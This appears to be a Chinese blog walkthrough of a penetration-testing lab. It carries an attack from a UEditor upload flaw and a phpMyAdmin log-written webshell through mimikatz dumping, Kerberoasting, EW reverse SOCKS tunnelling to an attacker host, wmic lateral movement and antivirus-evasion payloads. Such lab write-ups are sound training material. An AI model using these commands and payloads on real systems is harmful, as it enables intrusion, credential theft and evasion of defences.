文章目录

零、涉及知识点
一、打点
二、上线web1与data1
三、上线web2
四、收集web2的信息
- 4.1、使用EW代理socks5上传web2
五、破解域控明文
六、上线data2机器
七、渗透域控
- 7.1 过3x0

零、涉及知识点

站库分离、外网打点 、过杀软、多层网络渗透、横向渗透、jwt token密钥破解、phpmyadmin写shell、sqlserver 提权、SPN服务的利用、权限提升、域渗透

注意：实际的IP地址与上图略微不同.

一、打点

访问网站，随手测试admin目录，

弱口令测试，不对，发现可以注册，admin666/admin666

看到编辑器，基本稳了，首先判断下是否有漏洞Fuzz如下链接 ： http:// ackmoon /ueditor/net/controller.ashx?action=catchimagehttp://www.ackmoon.com/admin/net/controller.ashx?action=catchimage出现如下情况：

在服务器上传一个图片吗，命名为“  1.gif  “，URL填入地址为：XX.xx.xx.xx:8001/1.gif?.aspx

上传成功，地址：http://www.ackmoon.com/upfiles/image/20211015/6376990959962720203379344.aspx

访问大马，成功，


使用tasklist 获取目标机器运行进程，在https://payloads.net/kill_software/ 识别杀软还不少，

当然，使用net start 获取也可以，在这查询，

二、上线web1与data1

新建一个监听，

生成木马，


使用https://github.com/aeverj/ 直接免杀，工具需要nim，可以参考https://cloud.tencent.com/developer/article/1767307安装配置，

通过文件管理器将免杀吗上传到吧唧，

手动触发木马，

成功上线CS，

先把延时改为1


点击大马的文件管理，可以找到网站对应的路径，当然这个路径，在最上边注册账户登陆进去的地方也是存在的，

翻找一些网站配置文件，发现是站库分离的目标还是，

直接使用大马链接，

但是执行命令，没有反应

尝试，先执行这两个，在执行命令，成功，

先看看有没有杀软，

没有，继续上传我们刚刚生成的免杀吗，

上传成功，

第二个上传成功，

先调整延迟，


使用后渗透插件，进行提权https://github.com/DeEpinGh0st/Erebus

这个user选项变为system，且左边的图标出现红色的屏幕边，提权成功。

到此，web1与data1都已经拿下，

三、上线web2

先新增一个system会话，沉睡调为0，

先ipconfig看到两块网卡，“ shell ipconfig ”

这里可以在shell arp -a看看当前机器斗鱼哪些机器联系过，

因为这是八级，所以可以直接扫描端口，实际环境下这个搞估计直接被发现出局，

仅仅扫一下80就好了，

增加代理，端口任选一个，

注意这里的代理服务器是CS端的服务器，

这些我们就可以socks代理通过kali的CS将流量带入内网机器中，

使用代理打开火狐，


这里要是代理失败，检查一下是不是自己的电脑还开启了其他代理软件，要关闭成功访问web2机器的80端口，

使用给的demo登录，刷新，查看x-token参数是jwt，

复制到在线网站即可看到具体内容，

但是我们这里不知道密钥，无法修改内容，将内容复制到kali中，


使用hashcat直接爆破，具体命令：   hashcat -m 16500 jwt.txt -a 3 rockyou.txt -o s.txt得到密码为 Qweasdzxc5


再次刷新，注意到其服务是Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02


直接谷歌：  phpMyAdmin Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02疑似使用PHP studyV8.1搭建，       这个也可以通过扫目录爆出错误判断。


本地下载测试，得到该版本phpmyadmin的路径为  phpmyadmin4.8.5访问，

使用账号 root Qweasdzxc5 成功登录，

日志写shell，具体如下：SET global general_log = "ON"; 日志保存状态开启；SET global general_log_file ='C:/phpstudy_pro/WWW/xbb.php'; 修改日志的保存位置。SELECT '<?php phpinfo();eval($_REQUEST[8]);?>'

访问写入的一句吗，

使用中国一剑链接，先设置代理，

链接，

查看当前用户，

没有查到杀软，

直接CS开代理上线，

稍微配置，

生成木马，

上传木马成功，

手动执行，成功上线，


此时流量的走向是，web2将流量反向代理到data1，data1再把流量给我们的CS服务器

四、收集web2的信息

设置一下sleep 1，查看是否存在域。

使用net view收集一下域内信息，


这里直接看到域控了，直接ping 对应名称得到域控IP为“ 10.10.10.129 ”，这里后边手动设置域控IP为10.10.10.135。

使用命令，“logonpasswords”，         、、就是mimikatz

打开凭证，获得密码信息，

这样抓的不全，在试试“ hashdump ”，嗯嗯这就多了一些，

在线破解本地的管理员的明文密码为“ QWEasd.999 ”，

4.1、使用EW代理socks5上传web2

发现CS自带的socks4不稳定，直接上传ew到kali与目标机器（可以加资源等面纱），使用命令“ew -s rcsocks -l 1080 -e 1024”执行监听本机1024端口，将流量转发给1080，


将ew上传到data1机器，并执行命令“ shell C:\ew_for_win_32.exe -s rssocks -d 192.168.1.109 -e 1024 ”Kali上会立刻出现这个，

在次设置socks5代理，

在data1机器上设置一个新的监听，这个192.168.22.133就是data1机器的IP，


此时，所有给data1机器1080端口的流量都会通过ew给kali的1024端口，再次生成木马，

然后将木马，上传到web2，再次执行上线CS，

五、破解域控明文


此时在web2上，执行命令“ shell setspn -T ack123.com -q */* ”发现存在spn服务，

先把这个记录下来，


由于域内的任何用户都可以向域内的任何服务请求TGS，知道目标机器开启SPN服务后，可以用SPN申请一张票据 ST(TGS Ticket)，如果Kerberos 协议设置票据为 RC4加密，则可通过爆破的方式得到服务对应用户的密码。


接着使用猕猴桃“ mimikatz kerberos::ask /target:mysql/16server-dc1.ack123.com ”命令，申请创建票据，


使用命令“mimikatz kerberos::list”来看看票据是否创建成功，


已经创建票据成功，使用命令“kerberos::list /export”将票据导出，记得使用“pwd”，看看导出到了哪里，

将此票据下载，


暴力破解域控，破解脚本地址：https://github.com/nidem/kerberoast

具体命令如下，python3 tgsrepcrack.py /usr/share/wordlists/fasttrack.txt 4-40a10000-12server-web2\$\@mysql~16server-dc1.ack123.com-ACK123.COM.kirbipython3 脚本  字典  凭证


这有一个坑点是，破解脚本要把整个kerberoast项目下载下来，不然会报 “ No module named kerberos ”的错误，

得到域控的密码“  P@55w0rd! ”，

六、上线data2机器


得到域控的密码就可以通过IPC直接上传木马到data2机器，新建正向连接监听，


生成木马并上传带web2机器C盘，然后复制带data2机器，先执行“ net use \\10.10.10.135\ipc$ /user:administrator "P@55w0rd!" “命令“ shell copy C:\x2.exe \\10.10.10.128\c$\x2.exe “CS的会话还是会掉，直接使用蚁剑执行，

使用命令‘ wmic /node:10.10.10.128 /user:ack123\administrator /password:P@55w0rd! process call create "c:\x2.exe"  ’来让data2的机器运行木马，

但是最后的链接，必须在CS的web2机器会话执行，“ connect 10.10.10.128 6666 “

成功上线，

七、渗透域控


以同样的方式搞域控，但是有杀软，木马刚上去就没了。使用psexec尝试上线，之前在端口扫描的时候就发现了DC机器，我们查看目标，

直接右击设置，这个的密码填写明文与ntlm都可以，但是测试貌似ntlm下会做2次尝试，

但是psexec的横向也会被杀软拦截，。。。。先到这吧

7.1 过3x0


免杀项目地址 https://github.com/ORCA666/EVA2这个项目可以过国内主流杀软和windows的defender，拥有反调试技术，混绕外壳，在内存中解密shellcode。

使用cs attacks->payload generator->监听器->c>x64生成 payload复制payload的内容到encoder.py内替换raw_data

执行加密，python encoder.py

用vs2019打开项目copy编码后的内容替换 生成文件

内网渗透思路10之SPN拿下域控相关推荐

内网渗透，横向移动总结（mimikatz域控）
目录前言利用windows远程连接命令 ipc连接 at命令 schtasks命令 (在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令) 利用windows服务 ...
内网渗透系列：内网渗透思路整理
目录前言一.整体概述 1.攻击思路 2.敏感信息 3.攻击过程二.信息收集 1.主机发现 2.端口扫描 3.漏洞扫描 4.识别内网环境 (1)办公网 (2)生产网三.漏洞验证 / 漏洞攻击 ( ...
内网渗透思路整理与工具使用
前言上个学期一直在学审计,前几天ST2漏洞大火,随便打一个就是root权限,我却拿着root权限不知如何继续进行.因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的 ...
内网渗透思路06之一次完整的渗透测试
文章目录零.本章所用技术一.网络示意图二.信息收集之端口探测 2.1端口探测 2.2探测出的端口服务三.信息收集之子域名挖掘四.漏洞测试 4.1 dedecms 安全检测 4.1.0 网站指 ...
内网渗透：八、CVE-2020-1472 NetLogon 域内提权漏洞（域控密码置空）
简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来.该漏洞也称为"Z ...
内网渗透(十三)之内网信息收集-收集域环境中的基本信息
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...
内网渗透(五十)之域控安全和跨域攻击-使用其他工具导出域账号和散列值
系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内 ...

内网渗透思路10之SPN拿下域控

文章目录

零、涉及知识点

一、打点

二、上线web1与data1

三、上线web2

四、收集web2的信息

4.1、使用EW代理socks5上传web2

五、破解域控明文

六、上线data2机器

七、渗透域控

7.1 过3x0

内网渗透思路10之SPN拿下域控相关推荐

最新文章

热门文章